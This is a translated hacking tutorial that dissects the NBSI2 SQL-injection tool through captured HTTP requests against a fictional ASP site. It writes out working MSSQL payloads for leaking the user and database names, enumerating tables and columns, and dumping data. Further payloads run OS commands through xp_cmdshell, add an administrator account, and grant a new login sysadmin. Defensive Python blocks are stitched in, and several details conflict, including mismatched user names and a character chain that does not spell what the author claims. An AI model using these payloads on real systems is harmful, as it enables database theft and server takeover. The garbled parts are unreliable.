NBSI2's internal functions: the big secret revealed
SQL injection has been very popular for some time now. Anyone who has used Xiaozhu's NB2 knows that this tool is close to invincible: a beginner can use it to compromise a site without understanding the injection process at all, and so stays a beginner forever. Let's go ~~
First of all, I am just a rookie; I have only recently been studying SQL, and only recently the NB2 injection process. The tool WSE, I believe, is not unfamiliar to anyone; for those who do not have it, I give an address: http://www.gxgl.com/soft/wse06b1.zip. It is a program for monitoring and modifying the data a network application sends and receives, and it can help you debug web applications.
Enough talk, let's start. First find a site with a SQL injection vulnerability, www.testdb.net, and an injection point: http://www.testdb.net/Article_read.asp?id=80
Oh, and the site www.testdb.net does not, of course, exist.
Step 1: get the SQL Server database information
Open NB2, enter the address http://www.testdb.net/Article_read.asp?id=80, select the "GET" mode and click the "Detect" button. The SQL Server database information comes back as follows:
Multi-statement execution: unknown   Subquery: supported   Current user: TEST   User permissions: DB_OWNER   Current database: TestDB
Anyone who has used NB2 will be familiar with the above ~~
In the captured requests %20 decodes to a space, %2B to a plus sign and %25 to a percent sign.
HTTP/1.1 200 OK // the page returned successfully   HTTP/1.1 500 Internal Server Error // the injected query raised an error; the status code is how NB2 tells a true condition from a false one
The GET packets captured with WSE are as follows:
GET /article_read.asp?id=80 HTTP/1.1
GET /article_read.asp?id=80 and User+char(124)=0 HTTP/1.1   // that is: article_read.asp?id=80 and user+char(124)=0; char(124) is the character '|'
GET /article_read.asp?id=80;declare @a int-- HTTP/1.1   // that is: article_read.asp?id=80;declare @a int--; tests whether multiple statements are supported
GET /article_read.asp?id=80 and (select count(1) from [sysobjects])>=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80%3Bdeclare %40a int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
That is: article_read.asp?id=80 and (select count(1) from [sysobjects])>=0 // tests whether subqueries are supported
GET /article_read.asp?id=80 and User+char(124)=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
That is: article_read.asp?id=80 and user+char(124)=0 // obtains the current user. user is a built-in SQL Server function; its value is the user name of the current connection and its type is nvarchar. Comparing an nvarchar value with the integer 0 makes the server try to convert the nvarchar value to int, and that conversion is bound to fail.
The failed data type conversion raises a syntax error whose message quotes the value of user (here EAST_ASP), so the database user is exposed. The same trick works with "and user>0".
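The type-conversion trick above only works because the id parameter is pasted straight into the SQL text. As an added example (not code from the article, and not NBSI2 code), the Python below contrasts that vulnerable pattern with the hardened one on a constructed in-memory SQLite stand-in for the Article table: the first reader reproduces the concatenation and therefore the true/false channel (80 and 1=1 returns the row, 80 and 1=2 does not), while the second validates that id is an integer and binds it as a parameter, so the same inputs are rejected before any SQL runs. SQLite does not raise SQL Server's nvarchar-to-int conversion error, so only the boolean channel is reproduced; the table, its rows and the function names are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the page's Article table. SQLite is used only so
# the example runs offline; the site in the article runs SQL Server.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Article (ID INTEGER PRIMARY KEY, Title TEXT)")
    conn.executemany("INSERT INTO Article VALUES (?, ?)",
                     [(79, "first post"), (80, "hello world"), (81, "third post")])
    return conn

def read_article_unsafe(conn, raw_id):
    """Vulnerable pattern: the request parameter becomes part of the SQL text,
    so 'and 1=1' / 'and 1=2' run as part of the WHERE clause."""
    sql = "SELECT Title FROM Article WHERE ID=" + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def read_article_safe(conn, raw_id):
    """Hardened pattern: validate the type first, then bind the value as a
    parameter so it can never be parsed as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    row = conn.execute("SELECT Title FROM Article WHERE ID=?",
                       (int(raw_id),)).fetchone()
    return row[0] if row else None

def safe_rejects(conn, raw_id):
    """True when the hardened reader refuses the input before running any SQL."""
    try:
        read_article_safe(conn, raw_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    conn = make_db()
    for probe in ("80", "80 and 1=1", "80 and 1=2", "80;declare @a int--"):
        print(f"{probe!r:22} unsafe -> {read_article_unsafe(conn, probe)!r:14}"
              f" hardened rejects -> {safe_rejects(conn, probe)}")
```

The unsafe reader is exactly the behaviour NB2 measures with its 1=1 / 1=2 pair; the hardened reader returns the same article for a genuine id and raises for anything that is not a plain integer, so there is no difference left for the tool to observe.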
GET /article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80 and %28select count%281%29 from %5bsysObjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
That is: article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1
Function description:
is_srvrolemember indicates whether the login of the current user is a member of the specified server role.
Syntax: IS_SRVROLEMEMBER('role' [, 'login'])
'role': the name of the server role to check. Its data type is sysname. Valid values for role are: sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin.
'login': the optional name of the login to check. Its data type is sysname and the default is NULL. If it is not specified, the login of the current user is used.
SELECT CAST(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) AS varchar(1))+CHAR(124) gives the result "1|".
GET /article_read.asp?id=80 and cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))+char(124)=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80 and %28select count%281%29 from %5bsysObjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
That is: article_read.asp?id=80 and cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))+char(124)=1
SELECT CAST(IS_MEMBER(0x640062005f006f0077006e0065007200) AS varchar(1))+CHAR(124) gives the result "1|", the same result as above, but note that
the long string inside is_member is different from the one above. I don't know what it means: 0x730079007300610064006D0069006E00 converts to "| o | @ e". I thought
it was the string "sysadmin", but it seems not, so forget it, huh. I think it should be used to get the rights of the current user, such as DB_OWNER.
GET /article_read.asp?id=80 and db_name()+char(124)=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
That is: article_read.asp?id=80 and db_name()+char(124)=0. This one uses the db_name() function; there is no need to say much, everyone should know it: db_name() is another system function, and it returns the name of the current database.
With this, the analysis of the process of obtaining the SQL Server database information is complete. In addition, the POST method is not analyzed in detail here; you can look at it yourself. Below is the data captured when the POST method is used. It is basically the same as the GET method; mainly look at the last line. Several techniques are used in it: a plain numeric context, a quoted string context (closed with ''='), and a LIKE context (closed with '%'='), each with the user+char(124) probe and the 1=1 / 1=2 pair:
ID=80%20And%20User%2bchar(124)=0
ID=80'%20and%20User%2bchar(124)=0%20And%20''='
ID=80%25'%20and%20User%2bchar(124)=0%20And%20'%25'='
ID=80%20and%201=1
ID=80%20and%201=2
ID=80'%20And%201=1%20and%20''='
ID=80'%20AND%201=2%20And%20''='
ID=80%25'%20and%201=1%20And%20'%25'='
ID=80%25'%20and%201=2%20AND%20'%25'='
//
Step 2: guess the table names
TOP1
GET /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000)) FROM (SELECT top 1 ID,NAME%20FROM%20[TestDb]..[Sysobjects]%20where%20XTYPE=CHAR(85)%20ORDER%20BY%20ID)%20T%20ORDER%20BY%20ID%20DESC)>0 HTTP/1.1
That is: article_read.asp?id=80 and (select top 1 cast(Name as varchar(8000)) from (select top 1 ID,Name from [TestDb]..[sysobjects] where xtype=char(85) order by ID) T order by ID desc)>0   // char(85)='U', i.e. user tables
Its role is to obtain the name of the first table in the TestDB database; increasing TOP N in the same way yields the other table names.
TOP2
GET /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000)) FROM (SELECT top 2 ID,NAME%20FROM%20[TestDb]..[Sysobjects]%20where%20XTYPE=CHAR(85)%20ORDER%20BY%20ID)%20T%20ORDER%20BY%20ID%20DESC)>0 HTTP/1.1
...
TOPN
WSE captured packet information:
GET /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000)) FROM (SELECT top 1 ID,NAME%20FROM%20[testdb]..[sysobjects]%20where%20XTYPE=CHAR(85)%20ORDER%20BY%20ID)%20T%20ORDER%20BY%20ID%20DESC)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28select count%281%29 from %5BSYSObjects%5D%29%3E%3D0
...........
//
Step 3: guess the column names from a table name: Article
TOP1
GET /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000)) From (select top 1%20Colid,Name%20FROM%20[TestDb]..[Syscolumns]%20where%20ID%20=%20Object_ID(nchar(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20ORDER%20BY%20Colid)%20t%20ORDER%20BY%20Colid%20DESC)>0 HTTP/1.1
That is: article_read.asp?id=80 and (select top 1 cast(Name as varchar(8000)) from (select top 1 Colid,Name from [TestDb]..[syscolumns] where id=object_id(nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+nchar(116)+nchar(46)+nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69)) order by Colid) T order by Colid desc)>0
Its role is to obtain the name of the first column of the Article table; increasing TOP N in the same way yields the other column names.
Function description:
object_id returns the identification number of a database object.
Syntax: OBJECT_ID('object')
'object': the object to use. Its data type is char or nchar. If the data type of object is char, it is implicitly converted to nchar.
Return type: int
nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+nchar(116)+nchar(46)+nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69) corresponds to the string testdb..Article
That is: article_read.asp?id=80 and (select top 1 cast(Name as varchar(8000)) from (select top 1 Colid,Name from [TestDb]..[syscolumns] where id=object_id('testdb..Article') order by Colid) T order by Colid desc)>0
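Reading these captures by hand means URL-decoding them, replacing char()/nchar() chains with the strings they spell and, for the is_srvrolemember/is_member requests in step 1, turning the 0x... literal back into text. As an added example (not part of the article, and not NBSI2 or WSE code), the Python below does all three on constructed request fragments shaped like the captures. It assumes a literal + is kept as SQL string concatenation (the captures encode a literal plus sign as %2B, so only %-decoding is applied, not form decoding) and that 0x literals are UTF-16LE, which is how SQL Server stores nvarchar; decoding a sixteen-call nchar chain this way yields whatever string its character codes actually spell, which is more reliable than reading the codes by eye.

```python
import re
from urllib.parse import unquote

# Chains such as char(85) or nchar(101)+nchar(97)+... (T-SQL). The lookbehind
# keeps "char(1)" inside "varchar(1)" from being treated as a chain.
CHAR_CHAIN = re.compile(
    r"(?<![A-Za-z_])n?char\s*\(\s*\d+\s*\)(?:\s*\+\s*n?char\s*\(\s*\d+\s*\))*",
    re.IGNORECASE)
CHAR_CALL = re.compile(r"n?char\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
# Binary literals such as 0x730079007300610064006D0069006E00 (whole bytes only).
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")

def decode_char_chain(chain):
    """char(85) -> 'U'; nchar(116)+nchar(101)+... -> 'te...'"""
    codes = (int(c) for c in CHAR_CALL.findall(chain))
    return "'" + "".join(chr(c) if c < 0x110000 else "?" for c in codes) + "'"

def decode_hex_literal(hexdigits):
    """Interpret the bytes as UTF-16LE (an nvarchar value); keep the raw
    literal when the bytes are not valid UTF-16."""
    try:
        return "N'" + bytes.fromhex(hexdigits).decode("utf-16-le") + "'"
    except UnicodeDecodeError:
        return "0x" + hexdigits

def decode_request(fragment):
    """URL-decode one captured query string and rewrite the obfuscated
    literals into plain SQL."""
    text = unquote(fragment)  # %20 -> space, %2B -> +, %3E -> >; a raw + is left alone
    text = HEX_LITERAL.sub(lambda m: decode_hex_literal(m.group(1)), text)
    return CHAR_CHAIN.sub(lambda m: decode_char_chain(m.group(0)), text)

# Constructed fragments shaped like the captures in the article (assumption:
# the nchar chain here spells testdb..Article and is built in place).
SAMPLES = [
    "id=80%20and%20(select%20count(1)%20from%20[sysobjects])%3E%3D0",
    "id=80%20and%20user%2Bchar(124)=0",
    "id=80%20and%20cast(is_srvrolemember(0x730079007300610064006D0069006E00)"
    "%20as%20varchar(1))%2Bchar(124)=1",
    "where%20xtype%3Dchar(85)",
    "where%20id%3Dobject_id("
    + "%2B".join(f"nchar({ord(c)})" for c in "testdb..Article") + ")",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(decode_request(sample))
```

Run against the two hex literals from step 1, decode_hex_literal returns N'sysadmin' and N'db_owner', which is what the is_srvrolemember and is_member calls are checking; the tool passes the role names as binary literals only so that no quote characters appear in the request.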
TOP2
GET /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000)) From (select top 2%20Colid,Name%20FROM%20[TestDb]..[Syscolumns]%20where%20ID%20=%20Object_ID(nchar(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20ORDER%20BY%20Colid)%20t%20ORDER%20BY%20Colid%20DESC)>0 HTTP/1.1
TOPN
...
WSE captured packet information:
GET /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000)) From (select top 1%20Colid,Name%20FROM%20[TestDb]..[Syscolumns]%20where%20ID%20=%20Object_ID(nchar(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20ORDER%20BY%20Colid)%20t%20ORDER%20BY%20Colid%20DESC)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5BSYSObjects%5D%29%3E%3D0
...............
//
Step 4: get the field contents according to the column name
Field name: Title
TOP1
GET /article_read.asp?id=80 and (select top 1%20ISNULL(Cast([Title] AS varchar(8000)),CHAR(32))+char(124)%20FROM%20(SELECT%20top%201%20[Title]%20FROM%20[TestDB]..[Article]%20where%201=1%20ORDER%20BY%20[Title])%20T%20ORDER%20BY%20[Title]%20Desc)>0 HTTP/1.1
That is: article_read.asp?id=80 and (select top 1 isnull(cast([Title] as varchar(8000)),char(32))+char(124) from (select top 1 [Title] from [testdb]..[Article] where 1=1 order by [Title]) T order by [Title] desc)>0
Its role is to obtain the value of the Title field in the first row; increasing TOP N in the same way yields the values of the other rows.
TOP2
GET /article_read.asp?id=80 and (select top 1%20ISNULL(Cast([Title] AS varchar(8000)),CHAR(32))+char(124)%20FROM%20(SELECT%20top%202%20[Title]%20FROM%20[testdb]..[article]%20where%201=1%20ORDER%20BY%20[Title])%20T%20ORDER%20BY%20[Title]%20Desc)>0 HTTP/1.1
TOPN
...
WSE captured packet information:
// get the number of records in the Article table
GET /article_read.asp?id=80 and (select cast(count(1) AS varchar(8000))+char(124) From [testdb]..[Article]%20where%201=1)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0
// get the first record of the Title field of the Article table
GET /article_read.asp?id=80 and (select top 1%20ISNULL(Cast([Title] AS varchar(8000)),CHAR(32))+char(124)%20FROM%20(SELECT%20top%201%20[Title]%20FROM%20[TestDB]..[Article]%20where%201=1%20ORDER%20BY%20[Title])%20T%20ORDER%20BY%20[Title]%20Desc)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0
...............
//
At this point the analysis of table names, field names and field contents is basically over; now let's look at the other main functions.
Step 5: execute DOS commands and execute SQL statements
Execute the DOS command DIR C:\
WSE capture analysis:
GET /article_read.asp?id=80 and db_name()+char(124)=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0
GET /article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\>c:\nb_commander_txt.log';Drop Table%20NB_Commander_Tmp;CREATE%20TABLE%20NB_Commander_Tmp(ResultTxt%20varchar(7996)%20NULL);BULK%20INSERT%20[testdb]..[NB_Commander_Tmp]%20FROM%20'C:\NB_Commander_Txt.log' WITH (KEEPNULLS);Alter%20table%20NB_Commander_TMP%20ADD%20ID%20INT%20NOT%20null%20Identity%20(1,1)-- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0
Mainly this:
article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\>c:\nb_commander_txt.log';drop table NB_Commander_Tmp;create table NB_Commander_Tmp(ResultTxt varchar(7996) NULL);bulk insert [testdb]..[NB_Commander_Tmp] from 'c:\nb_commander_txt.log' with (KEEPNULLS);alter table NB_Commander_Tmp add ID int not null identity(1,1)--
BULK INSERT copies a data file into a database table or view in the format specified by the user. KEEPNULLS specifies that empty columns keep a null value during the bulk copy operation instead of being assigned the column's default value. For details see the T-SQL syntax, where it is described in full.
The function of the statement above is to save the output of the DOS command DIR C:\ to the file nb_commander_txt.log, then load the contents of that file into the new temporary table
NB_Commander_Tmp and add an auto-increment ID field. I believe everyone finds this easy to understand.
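From the defender's side, every step walked through in this article leaves a recognisable trace in the web server log: the 1=1 / 1=2 pairs from the POST list at the end of step 1, the declare @a int stacked-query probe, the user+char(124) conversion error (an HTTP 500), and the xp_cmdshell / BULK INSERT / NB_Commander_Tmp chain just explained. As an added example (not part of the article, and not NBSI2 code), the Python below runs those signatures over a few constructed IIS-style log lines (date, time, client IP, method, URI stem, URI query, status) and reports per client which probes were seen, whether both halves of a true/false pair were sent, and how many 5xx responses came back. The log format, field order, IP addresses and thresholds are assumptions.

```python
import re
from urllib.parse import unquote

# Signatures for the probes the article walks through, matched against the
# URL-decoded query string.
SIGNATURES = {
    "stacked-query probe":   re.compile(r"declare\s+@\w+\s+int", re.I),
    "schema enumeration":    re.compile(r"\bsys(?:objects|columns)\b", re.I),
    "user leak via cast":    re.compile(r"\buser\s*(?:\+\s*char\(124\)|>\s*0)", re.I),
    "privilege fingerprint": re.compile(r"is_srvrolemember|is_member|db_name\(\)", re.I),
    "os command execution":  re.compile(r"xp_cmdshell|bulk\s+insert|nb_commander_tmp", re.I),
    "login manipulation":    re.compile(r"sp_addlogin|sp_addsrvrolemember", re.I),
}
TRUE_PROBE = re.compile(r"\band\s+1\s*=\s*1\b", re.I)
FALSE_PROBE = re.compile(r"\band\s+1\s*=\s*2\b", re.I)

# Constructed W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    "2004-03-01 10:15:01 10.0.0.5 GET /article_read.asp id=80 200",
    "2004-03-01 10:15:02 10.0.0.5 GET /article_read.asp id=80%20and%201=1 200",
    "2004-03-01 10:15:03 10.0.0.5 GET /article_read.asp id=80%20and%201=2 200",
    "2004-03-01 10:15:04 10.0.0.5 GET /article_read.asp id=80%3Bdeclare%20@a%20int-- 200",
    "2004-03-01 10:15:05 10.0.0.5 GET /article_read.asp id=80%20and%20user%2Bchar(124)=0 500",
    "2004-03-01 10:15:06 10.0.0.5 GET /article_read.asp id=80%3Bexec%20master..xp_cmdshell%20%27dir%20c%3A%5C%27-- 200",
    "2004-03-01 10:16:00 10.0.0.9 GET /article_read.asp id=81 200",
    "2004-03-01 10:16:01 10.0.0.9 GET /article_read.asp id=82 404",
]

def parse_line(line):
    """Split one log line into (client ip, uri stem, decoded query, status)."""
    _date, _time, ip, _method, stem, query, status = line.split()
    return ip, stem, unquote(query), int(status)

def scan_log(lines):
    """Aggregate per client IP: which signatures fired, whether both halves of
    a true/false probe pair were sent, and how many 5xx responses came back."""
    report = {}
    for line in lines:
        ip, _stem, query, status = parse_line(line)
        entry = report.setdefault(ip, {"signatures": set(), "true_probe": False,
                                       "false_probe": False, "errors": 0})
        for name, pattern in SIGNATURES.items():
            if pattern.search(query):
                entry["signatures"].add(name)
        entry["true_probe"] |= bool(TRUE_PROBE.search(query))
        entry["false_probe"] |= bool(FALSE_PROBE.search(query))
        if status >= 500:
            entry["errors"] += 1
    return report

def suspicious_clients(lines, min_errors=3):
    """IPs that sent any signature, a complete true/false pair, or too many
    server errors (the error threshold is an assumed tuning value)."""
    report = scan_log(lines)
    return sorted(ip for ip, e in report.items()
                  if e["signatures"] or (e["true_probe"] and e["false_probe"])
                  or e["errors"] >= min_errors)

if __name__ == "__main__":
    for ip, e in scan_log(SAMPLE_LOG).items():
        pair = "pair" if e["true_probe"] and e["false_probe"] else "-"
        print(ip, sorted(e["signatures"]), pair, e["errors"])
    print("suspicious:", suspicious_clients(SAMPLE_LOG))
```

The table-name and column-name queries of steps 2 and 3 are caught by the schema-enumeration signature, and the sp_addlogin / sp_addsrvrolemember requests at the end of the article by the login-manipulation one; the true/false pair on its own is worth alerting on because it is the first thing the tool sends before any of the louder payloads.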
ID=1
GET /article_read.asp?id=80 and (select top 1 case when ResultTxt%20is%20null Then '|'%20else%20ResultTxt%2b'|'%20END%20FROM%20NB_Commander_TMP%20where%20ID=1)=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27Dir C%3A%5C %3E C%3A%5CNB%5Fcommander%5FTXT%2ELOG%27%3BDrop Table NB%5Fcommander%5FTMP%3BCREATE TABLE NB%5Fcommander%5FTMP%28Resulttxt varchar%287996%29 NULL%29%3BBULK INSERT %5BtestDB%5D%2E%2E%5BNB%5FCommander%5FTMP%5D from %27C%3A%5CNB%5Fcommander%5FTXT%2ELOG%27 with %28keepnulls%29%3Balter Table NB%5FCommander%5FTMP Add ID INT NOT NULL IDENTITY %281%2C1%29%2D%2D
That is: article_read.asp?id=80 and (select top 1 case when ResultTxt is null then '|' else ResultTxt+'|' end from NB_Commander_Tmp where ID=1)=0
This returns the first line of the echoed output; in the same way, ID=N below returns all the lines of the echoed output.
ID=2
GET /article_read.asp?id=80 and (select top 1 case when ResultTxt%20is%20null Then '|'%20else%20ResultTxt%2b'|'%20END%20FROM%20NB_Commander_TMP%20where%20ID=2)=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27Dir C%3A%5C %3E C%3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP TABLE NB%5FCommander%5FTmp%3BCREATE TABLE NB%5FCommander%5FTmp%28ResultTxt varchar%287996%29 NULL%29%3BBULK INSERT %5Btestdb%5D%2E%2E%5BNB%5Fcommander%5FTMP%5D from %27C%3A%5CNB%5Fcommander%5FTXT%2ELOG%27 with %28keepnulls%29%3Balter Table NB%5FCommander%5FTMP Add ID INT NOT NULL IDENTITY %281%2C1%29%2D%2D
ID = N
...............
Output display: [unexpected output] [unexpected output] [unexpected output] [unexpected output] ......
Normally, if there is no problem, all the files under C:\ are listed. When the prompt above appears instead, the reason is that the table NB_COMMANDER_TMP was not created successfully, so the output cannot be returned correctly.
Capture analysis without echo: DOS command DIR C:\
GET /article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\'-- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BDROP TABLE NB%5FCommander%5FTmp%3BEXEC Master%2e%2exp%5FCMDSHELL %27DEL C%3A%5CNB%5Fcommander%5FTXT%2ELOG%27%2D%2D
That is: article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\'-- // the output does not need to be displayed. (The cookie still carries the previous request, which dropped the temporary table and deleted the log file.)
Output display: command execution complete
DOS command: net user tsinternetusers password /add
GET /article_read.asp?id=80;exec master..xp_cmdshell 'net user tsinternetusers password /add'-- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27DIR C%3A%5C%27%2D%2D
Other DOS commands are executed the same way:
id=80;exec master..xp_cmdshell 'net user tsinternetusers password /add'--
id=80;exec master..xp_cmdshell 'net localgroup administrators tsinternetusers /add'--
Execute SQL commands (in the same way as executing DOS commands)
GET /article_read.asp?id=80;exec master..sp_addlogin username,password-- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27NET User TsinterNetUsers Password %2FADD%27%2D%2D
id=80;exec master..sp_addlogin username,password--
id=80;exec master..sp_addsrvrolemember username,sysadmin--
....
At this point the analysis of NB2's main functions is complete; the other functions you can analyze yourselves. This is the first time I have written such a long article, so it may be very chaotic and there are surely many problems, but I really have no energy left
to revise it. I hope everyone can understand. Thank you!